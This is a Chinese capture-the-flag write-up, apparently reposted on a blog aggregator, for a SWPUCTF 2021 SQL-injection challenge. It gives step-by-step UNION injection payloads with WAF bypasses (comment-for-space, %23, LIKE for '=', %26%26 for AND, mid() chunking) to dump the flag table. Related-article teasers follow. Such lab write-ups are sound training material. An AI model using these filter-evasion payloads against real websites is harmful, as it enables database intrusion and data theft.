[SWPUCTF 2021 新生赛]sql

[SWPUCTF 2021 新生赛]sql wp

输入 1 正常回显:
?wllm=1
返回:
Want Me? Cross the Waf
Your Login name:xxx
Your Password:yyy
输入单引号引发报错:
?wllm=1'
返回:
Want Me? Cross the Waf
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
group by 测试回显行数:
1' group by 3#

触发了 waf :

wwwwwwwwwwwwwww

可能是过滤了空格,也可能是 group by 关键字,还可能是注释符。一个一个测:

输入: ?wllm=1 1 ,触发 waf ,说明空格被过滤,使用 /**/ 替换空格: ?wllm=1/**/1 ,成功回显。

除此之外常被用来替换空格的还有:

%20
%09
%0A(%0a)
%0C(%0c)
%0D(%0d)
%0B(%ob)
%A0(%a0)

输入:?wllm=group/**/by ,正常回显,说明该关键字没有被过滤。

使用 /**/ 替换空格,再次用 group by 测试列数:

输入:

?wllm=1'/**/group/**/by/**/2#

引发报错:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1

说明 # 被过滤,尝试其他注释符:----+ ,%23(#的URL编码)。最后只有 %23 可以用:

?wllm=1'/**/group/**/by/**/2%23

经过测试,共有 3 列。

select 查询回显位

由于开头的 1 会干扰回显,所以这里去掉1(或者换成负数也行):

?wllm='/**/union/**/select/**/1,2,3%23

经过测试,回显位为后两位。

select 查询数据库
?wllm='/**/union/**/select/**/1,2,database()%23

在这里插入图片描述

数据库名称为:test_db

select 查询表名:
?wllm='/**/union/**/select/**/1,2,table_name/**/from/**/information_schema.tables/**/where/**/table_schema=test_db%23

但是触发了 waf ,一开始我以为是 information_schema 被过滤了,经过测试,是等号被过滤了。

用 like 关键字可以替换等号,比如:table_schema=ctf 可以写成 table_schema like 'ctf'

用 like 替换等号查询表名:
?wllm='/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23

成功回显,LTLT_flag 就是要找的表名。

select 查询列名:
?wllm='/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'test_db'/**/and/**/table_name/**/like/**/'LTLT_flag'%23

但是被 waf 了,猜测是 and 出问题了。尝试了大小写,&& 替换 and 都不行,最后用 %26%26 成功绕过。

%26 就是 & 的 URL 编码。

用 %26%26 替换 and 查询列名:
?wllm='/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'test_db'/**/%26%26/**/table_name/**/like/**/'LTLT_flag'%23

成功回显:

在这里插入图片描述

select 查询 flag 列的内容:
?wllm='/**/union/**/select/**/1,2,flag/**/from/**/LTLT_flag%23

出来了但没完全出来:

在这里插入图片描述

这里看了下大佬的 wp ,substr,substring 都被过滤了,说用 mid 函数分段读取。

mid 函数分段读取 flag :

读取第一段:

?wllm='/**/union/**/select/**/1,2,mid(flag,1,20)/**/from/**/LTLT_flag%23

在这里插入图片描述

读取第二段:

?wllm='/**/union/**/select/**/1,2,mid(flag,21,40)/**/from/**/LTLT_flag%23

在这里插入图片描述

读取第三段:

?wllm='/**/union/**/select/**/1,2,mid(flag,41,60)/**/from/**/LTLT_flag%23

在这里插入图片描述

经过拼接,得到了一个完整的 flag 。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/273656.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

指点云 宁波大带宽大存储云服务器 性能评测

指点云 宁波大带宽大存储云服务器 性能评测

指点云 浙江宁波 云服务器 性能测评,2核4G 100兆带宽 240G存储 5G防御 仅需76.8元/月;4核8G仅需112.8元/月。 官网地址:https://url.vpszj.cn/zhidianyun 优惠注册地址:https://url.vpszj.cn/zhidianyun_r 性价比高的服务器推荐…
阅读更多...
【产品设计】零代码核心模块之三:报表

【产品设计】零代码核心模块之三:报表

报表的用于数据和信息呈现的一种方式,能够帮助人们更直观地了解数据和信息,从而做出更明智的决策。本文从报表的价值、产品功能以及数据统计分析出发,探讨报表的重要性与使用场景,希望对你有所启发。 报表适用于需要呈现数据或信息…
阅读更多...
Spring高手之路-Spring支持的注入方式、Spring为什么不建议使用基于字段的依赖注入

Spring高手之路-Spring支持的注入方式、Spring为什么不建议使用基于字段的依赖注入

目录 Spring支持的注入方式 1.字段注入 2.构造器注入 3.setter注入 使用构造器注入存在的问题 Spring为何不建议使用基于字段的依赖注入 1.单一职责问题 2.可能产生NPE(空指针异常) 3.隐藏依赖 4.不利于测试 Spring支持的注入方式 1.字段注入 A…
阅读更多...
k8s的二进制部署: 源码包部署-----node节点部署

k8s的二进制部署: 源码包部署-----node节点部署

服务器IP软件包k8s--master0120.0.0.61kube-aplserver,kube-controer-manager,kube-scheduler,etcdk8s--master0220.0.0.62kube-controer-manager,kube-schedulernode节点0120.0.0.62kubelet,kube-proxy,et…
阅读更多...
【http】HTTP/1.0、HTTP/1.1和HTTP/2.0

【http】HTTP/1.0、HTTP/1.1和HTTP/2.0

✨ 专栏介绍 在当今互联网时代,计算机网络已经成为了人们生活和工作中不可或缺的一部分。而要实现计算机之间的通信和数据传输,就需要依靠各种网络协议来进行规范和约束。无论是浏览网页、发送电子邮件还是进行在线交流,都离不开各种各样的网…
阅读更多...
2023年航天大事件

2023年航天大事件

2023年,中国完成宇航发射近70次,是中国航天新的里程碑。中国科技工作者继续推进航天科技创新,并在运载火箭发动机研制固体燃料火箭研发、可重复航天器研发等方面取得重大突破;继续推进载人航天工程、北斗工程等中国重大航天旗舰工…
阅读更多...
HOJ 项目部署-前端定制 默认勾选显示标签、 在线编辑器主题和字号大小修改、增加一言功能 题目AC后礼花绽放

HOJ 项目部署-前端定制 默认勾选显示标签、 在线编辑器主题和字号大小修改、增加一言功能 题目AC后礼花绽放

# 项目拉取地址: https://gitee.com/himitzh0730/hoj.git # 切换到hoj-vue目录执行以下命令 #安装依赖 npm install #运行服务 npm run serve #修改代码后构建项目到dist文件夹,到服务器docker-compose.yml中修改hoj-frontend文件映射即可 npm run build…
阅读更多...
python进阶 — Python解释器

python进阶 — Python解释器

1、Python解释器 Python解释器是一个计算机程序,它将Python代码转换为计算机可以理解的机器代码,并执行这些机器代码。 1. 这篇文章介绍如何下载和安装Python解释器: python基础(2)— 环境搭建 2 . 这篇文章介绍如…
阅读更多...
果然,大厂都在卷这个!

果然,大厂都在卷这个!

大家好,我是鱼皮。首先祝大家平安夜快乐!给大家看看我们搞的小圣诞树哈哈~ 言归正传,这周中我去北京待了 2 天,主要是收到百度的邀请去参加百度云的智算大会,听说有些 AI 产品要发布。 我自己是非常关注国内…
阅读更多...
C#教程(四):多态

C#教程(四):多态

1、介绍 1.1 什么是多态 在C#中,多态性(Polymorphism)是面向对象编程中的一个重要概念,它允许不同类的对象对同一消息做出响应,即同一个方法可以在不同的对象上产生不同的行为。C#中的多态性可以通过以下几种方式实现…
阅读更多...
每日一题-----逆序字符串

每日一题-----逆序字符串

大家好我是Beilef,在一个美好的下午我意外接触到编程并且产生了兴趣,哈哈我要努力成为一个跨界者,让我们一起加油吧O(∩_∩)O 文章目录 目录 文章目录 前言 大家好请上车 一、逆序字符串 题⽬描述: 输⼊⼀个字符串,写…
阅读更多...
UiPath报告 | 2024年7大自动化和Al趋势

UiPath报告 | 2024年7大自动化和Al趋势

在自动化与人工智能的合力推动下,全球企业正在步入一个创造价值的新纪元。 预计市场将涌现出一系列高潜力的AI应用实例; 企业的日常运营和复杂流程管理方式将面临根本性的变革,人工智能的崛起正加速企业自动化进程,促成价值的快速…
阅读更多...
【WPF】使用Behavior以及ValidationRule实现表单校验

【WPF】使用Behavior以及ValidationRule实现表单校验

文章目录 使用ValidationRule实现检测用户输入EmptyValidationRule 非空校验TextBox设置非空校验TextBox设置非空校验并显示校验提示 结语 使用ValidationRule实现检测用户输入 EmptyValidationRule是TextBox内容是否为空校验,TextBox的Binding属性设置ValidationRu…
阅读更多...
Centos7:Jenkins+gitlab+node项目启动(1)

Centos7:Jenkins+gitlab+node项目启动(1)

安装Jenkins 虚拟机配置 需要的软件 https://download.csdn.net/download/myy2012/88668255 解压到目录 用xftp 上传 开始安装jdk rmp -ivh jdk-8u181-linux-x64.rpm 开始安装jenkins rmp -ivh jenkins-2.99-1.1.noarch.rpm 修改用户与端口(端口按需修改) vim /etc/sy…
阅读更多...
Matlab之State Flow

Matlab之State Flow

打开方式 方式一:在命令窗口输入State Flow或者简写sf就能打开,并且会自动打开State Flow 的Library。从左到右分别是图表、真值表、状态转换表、例子、顺序查看,可以加入到Simulink当中。 方式二:从Simulink Library里面添加Sta…
阅读更多...
Xshell 从github克隆项目:使用ssh方式。

Xshell 从github克隆项目:使用ssh方式。

接上文: https://blog.csdn.net/liu834189447/article/details/135247868 是能克隆项目了,但是速度太磕碜了,磕碜到难以直视。 找到另外一种办法,使用SSH克隆项目 速度嘎嘎猛。 首先得能进得去github网站,不能点上边…
阅读更多...
Pikachu靶场 “Http Header”SQL注入

Pikachu靶场 “Http Header”SQL注入

1. 先在 pikachu 打开 Http Header 注入模块,点击提示 查看登录 账号 和 密码,登陆后去 Burp 中找到登陆的 GET请求 2. 设置payload1 :在 User-Agent最后 输入 查看 数据库名 or updatexml(1,concat(0x7e,database()),0) or 查看 用户名…
阅读更多...
File Inclusion(Pikachu)

File Inclusion(Pikachu)

File Inclusion(local) 这里随便点击一个提交 观察url,显示是一个文件file1.php 可以直接通过url修改这个文件 找到自己的文件(本地文件)shell.php的路径写上去 就可以看到 File Inclusion(remote) 提交的是一个目标…
阅读更多...
uni-app和Vue.js有什么区别?

uni-app和Vue.js有什么区别?

Hello,大家好,我是咕噜铁蛋!在当今的前端开发领域,uni-app和Vue.js都是非常热门的技术。很多开发者经常在选择时感到困惑。今天铁蛋这篇文章讲和大家探讨这两者的区别,帮助各位在开发路上做出明智的选择。 1. uni-app是…
阅读更多...
Java日期工具类时间校验

Java日期工具类时间校验

Java日期工具类时间校验 嘚吧嘚正则表达式版本一版本二版本三 SimpleDateFormat工具类 嘚吧嘚 时间校验这个问题,我在网上找了很多资料,有用正则表达式的、有用格式工具类的。🤨 其实都能实现时间校验,既然两种方式都能实现&…
阅读更多...
最新文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发 尧图建网站